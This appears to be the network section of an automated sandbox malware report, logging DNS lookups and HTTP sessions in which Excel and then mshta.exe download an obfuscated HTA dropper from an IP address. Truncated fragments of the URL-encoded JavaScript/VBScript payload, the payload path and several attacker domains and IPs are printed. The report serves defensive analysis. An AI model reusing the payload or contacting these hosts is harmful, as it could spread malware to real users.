                                                                                                                                                  Nov 18, 2024 18:22:44.250032902 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.250103951 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.250118971 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.250133991 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.250161886 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.250191927 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.252019882 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.252105951 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.252120972 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.252150059 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.252175093 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.252191067 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.252207041 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.252216101 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.252223969 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.252249956 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.252305031 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.252345085 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.310947895 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.310966969 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.310992956 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.311021090 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.311079025 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.311094999 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.311110973 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.311124086 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.311157942 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.327081919 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327110052 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327126026 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327184916 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.327477932 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327523947 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.327552080 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327568054 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327605009 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.327753067 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327766895 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327811003 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.327853918 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327908039 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327922106 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.327956915 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.342000961 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.368525982 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.368556023 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.368567944 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.368609905 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.368638039 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.368683100 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.371855021 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.376751900 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:57.562103987 CET4917680192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:57.566984892 CET804917646.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:57.567060947 CET4917680192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:57.567322969 CET4917680192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:57.567322969 CET4917680192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:57.572161913 CET804917646.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:57.572379112 CET804917646.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:57.572392941 CET804917646.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:58.746625900 CET804917646.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:58.747956038 CET4917680192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:58.753298044 CET804917646.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:58.753566027 CET4917680192.168.2.2246.173.214.24
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 18, 2024 18:21:28.875463009 CET5456253192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:21:28.882519007 CET53545628.8.8.8192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.303369999 CET5291753192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:21:31.312345982 CET53529178.8.8.8192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:53.220351934 CET6275153192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:21:53.234504938 CET53627518.8.8.8192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:53.250118971 CET5789353192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:21:53.258137941 CET53578938.8.8.8192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:57.290863037 CET5482153192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:21:57.302972078 CET53548218.8.8.8192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.254371881 CET5471953192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:22:16.261893034 CET53547198.8.8.8192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.265002966 CET4988153192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:22:16.275073051 CET53498818.8.8.8192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:40.965764046 CET5499853192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:22:41.072778940 CET53549988.8.8.8192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:41.183686018 CET5278153192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:22:41.191252947 CET53527818.8.8.8192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:56.758173943 CET6392653192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:22:57.112112045 CET53639268.8.8.8192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:57.451922894 CET6551053192.168.2.228.8.8.8
                                                                                                                                                  Nov 18, 2024 18:22:57.557776928 CET53655108.8.8.8192.168.2.22
                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Nov 18, 2024 18:21:28.875463009 CET192.168.2.228.8.8.80x2adaStandard query (0)link.uebie.deA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:21:31.303369999 CET192.168.2.228.8.8.80x69d5Standard query (0)link.uebie.deA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:21:53.220351934 CET192.168.2.228.8.8.80x5109Standard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:21:53.250118971 CET192.168.2.228.8.8.80x75d6Standard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:21:57.290863037 CET192.168.2.228.8.8.80x4ffStandard query (0)link.uebie.deA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:16.254371881 CET192.168.2.228.8.8.80xdc80Standard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:16.265002966 CET192.168.2.228.8.8.80xee6bStandard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:40.965764046 CET192.168.2.228.8.8.80x622aStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:41.183686018 CET192.168.2.228.8.8.80xa59fStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:56.758173943 CET192.168.2.228.8.8.80xc6ddStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:57.451922894 CET192.168.2.228.8.8.80x1333Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Nov 18, 2024 18:21:28.882519007 CET8.8.8.8192.168.2.220x2adaNo error (0)link.uebie.de5.45.108.48A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:21:31.312345982 CET8.8.8.8192.168.2.220x69d5No error (0)link.uebie.de5.45.108.48A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:21:53.234504938 CET8.8.8.8192.168.2.220x5109No error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:21:53.234504938 CET8.8.8.8192.168.2.220x5109No error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:21:53.258137941 CET8.8.8.8192.168.2.220x75d6No error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:21:53.258137941 CET8.8.8.8192.168.2.220x75d6No error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:21:57.302972078 CET8.8.8.8192.168.2.220x4ffNo error (0)link.uebie.de5.45.108.48A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:16.261893034 CET8.8.8.8192.168.2.220xdc80No error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:16.261893034 CET8.8.8.8192.168.2.220xdc80No error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:16.275073051 CET8.8.8.8192.168.2.220xee6bNo error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:16.275073051 CET8.8.8.8192.168.2.220xee6bNo error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:41.072778940 CET8.8.8.8192.168.2.220x622aNo error (0)prolinice.ga46.173.214.24A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:41.191252947 CET8.8.8.8192.168.2.220xa59fNo error (0)prolinice.ga46.173.214.24A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:57.112112045 CET8.8.8.8192.168.2.220xc6ddNo error (0)prolinice.ga46.173.214.24A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 18, 2024 18:22:57.557776928 CET8.8.8.8192.168.2.220x1333No error (0)prolinice.ga46.173.214.24A (IP address)IN (0x0001)false
                                                                                                                                                  • link.uebie.de
                                                                                                                                                  • 1017.filemail.com
                                                                                                                                                  • 107.172.44.178
                                                                                                                                                  • ashjidrdhauflvyw.net
                                                                                                                                                    • prolinice.ga
                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.2249162107.172.44.178803224C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 18, 2024 18:21:30.249327898 CET398OUTGET /53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: 107.172.44.178
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 18, 2024 18:21:30.915465117 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:21:30 GMT
                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                  Last-Modified: Mon, 18 Nov 2024 01:50:06 GMT
                                                                                                                                                  ETag: "2c929-6272622c7ca10"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 182569
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/hta
                                                                                                                                                  Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 32 25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 35 32 38 25 32 35 32 35 32 32 25 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 32 35 33 45 25 32 35 32 35 32 35 30 41 25 32 35 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 35 32 30 68 74 74 70 [TRUNCATED]
                                                                                                                                                  Data Ascii: <script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CsCRipt%25252520TYPE%2525253D%25252522TExt/vbsCrIpt%25252522%2525253E%2525250AdIM%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                                                                                                  Nov 18, 2024 18:21:30.915544033 CET224INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                                                                                                  Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525250
                                                                                                                                                  Nov 18, 2024 18:21:30.915555000 CET1236INData Raw: 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39
                                                                                                                                                  Data Ascii: 9%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525250
                                                                                                                                                  Nov 18, 2024 18:21:30.915592909 CET1236INData Raw: 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35
                                                                                                                                                  Data Ascii: 5252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2
                                                                                                                                                  Nov 18, 2024 18:21:30.915606976 CET424INData Raw: 32 35 30 39 25 32 35 32 35 32 35 30 39 71 55 72 6b 59 54 56 68 71 76 4f 72 4e 76 64 52 6e 5a 6b 63 63 48 45 70 76 78 48 52 57 51 66 62 50 67 43 50 43 5a 63 74 51 75 72 6a 47 79 58 67 49 67 53 56 59 71 67 56 54 6c 59 61 5a 55 62 50 50 64 56 68 68
                                                                                                                                                  Data Ascii: 2509%25252509qUrkYTVhqvOrNvdRnZkccHEpvxHRWQfbPgCPCZctQurjGyXgIgSVYqgVTlYaZUbPPdVhhoTLifWhxScaxoKydNGSCCSLIuWVfszgcVXGglGeCNUVxgNGFgHDmesUmyrLzHoJBbOyzsvXipZnvodpTCJvMAyvYoPJMFsJUQVJcktGEJVwhxHthkpQPxnkiZQiGTKduuUHDvzagaiRumCOKnakkELieNWFWguLrW
                                                                                                                                                  Nov 18, 2024 18:21:30.915630102 CET1236INData Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                                                                                                  Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252
                                                                                                                                                  Nov 18, 2024 18:21:30.915643930 CET248INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                                                                                                  Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                                                                                                  Nov 18, 2024 18:21:30.915654898 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32
                                                                                                                                                  Data Ascii: 2509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525
                                                                                                                                                  Nov 18, 2024 18:21:30.915683985 CET1236INData Raw: 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39
                                                                                                                                                  Data Ascii: 9%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525252C%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525250
                                                                                                                                                  Nov 18, 2024 18:21:30.915700912 CET424INData Raw: 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35
                                                                                                                                                  Data Ascii: 5252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2
                                                                                                                                                  Nov 18, 2024 18:21:30.920734882 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                  Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.2249164107.172.44.178803544C:\Windows\System32\mshta.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 18, 2024 18:21:32.795922995 CET475OUTGET /53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Range: bytes=8896-
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Host: 107.172.44.178
                                                                                                                                                  If-Range: "2c929-6272622c7ca10"
                                                                                                                                                  Nov 18, 2024 18:21:33.487416983 CET1236INHTTP/1.1 206 Partial Content
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:21:33 GMT
                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                  Last-Modified: Mon, 18 Nov 2024 01:50:06 GMT
                                                                                                                                                  ETag: "2c929-6272622c7ca10"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 173673
                                                                                                                                                  Content-Range: bytes 8896-182568/182569
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/hta
                                                                                                                                                  Data Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 [TRUNCATED]
                                                                                                                                                  Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
                                                                                                                                                  Nov 18, 2024 18:21:33.487498045 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                  Data Ascii: 52509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509LeJfEyNpTpulRvvyFVNiAuWXCxDVjmubpFoKEhKCWMtCmkeqxpVLOUEJpvdnFDDZVrDzoboihXlxeVkdQqvBAoNelfFOMcEKChRFiBmPBTmgUZDtNUANkZlTrywHfclOpXrmPdvgguK
                                                                                                                                                  Nov 18, 2024 18:21:33.487519979 CET1236INData Raw: 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30
                                                                                                                                                  Data Ascii: 09%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252525
